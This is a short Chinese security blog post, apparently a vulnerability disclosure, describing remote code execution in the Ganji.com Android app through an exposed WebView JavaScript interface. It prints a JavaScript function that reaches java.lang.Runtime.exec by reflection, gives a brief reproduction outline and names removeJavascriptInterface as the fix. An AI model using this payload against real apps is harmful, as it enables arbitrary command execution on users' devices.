赶集网远程代码执行漏洞(啥都有) – 网站安全 –

时间: 2020-10-11|tag: 38次围观|0 条评论

赶集网手机客户端,android版

参考: http://www.2cto.com/Article/201309/241271.html 

我的android系统是4.1.2
 

function execute(cmdArgs)
{
return Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}

 

1,进入“通知”界面,随便点击一个链接,再通过里面某一些功能就可以了。

 

赶集网远程代码执行漏洞(啥都有) – 网站安全 –插图

2,接口已出。
 

赶集网远程代码执行漏洞(啥都有) – 网站安全 –插图1

 

修复方案:

赶集网大公司不应该有这些低级漏洞

参见: 

http://www.2cto.com/Article/201309/241271.html  

解决方法: http://www.2cto.com/Article/201404/296370.html 

测试页面:http://drops.wooyun.org/webview.html

调用removeJavascriptInterface方法,删除接口。
    上一篇: 程氏舞曲CMS储存型 xss(6) 附后台getshell - 网站安

    下一篇: 某通用性cms任意文件上传漏洞 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《赶集网远程代码执行漏洞(啥都有) – 网站安全 –
   

还没有人抢沙发呢~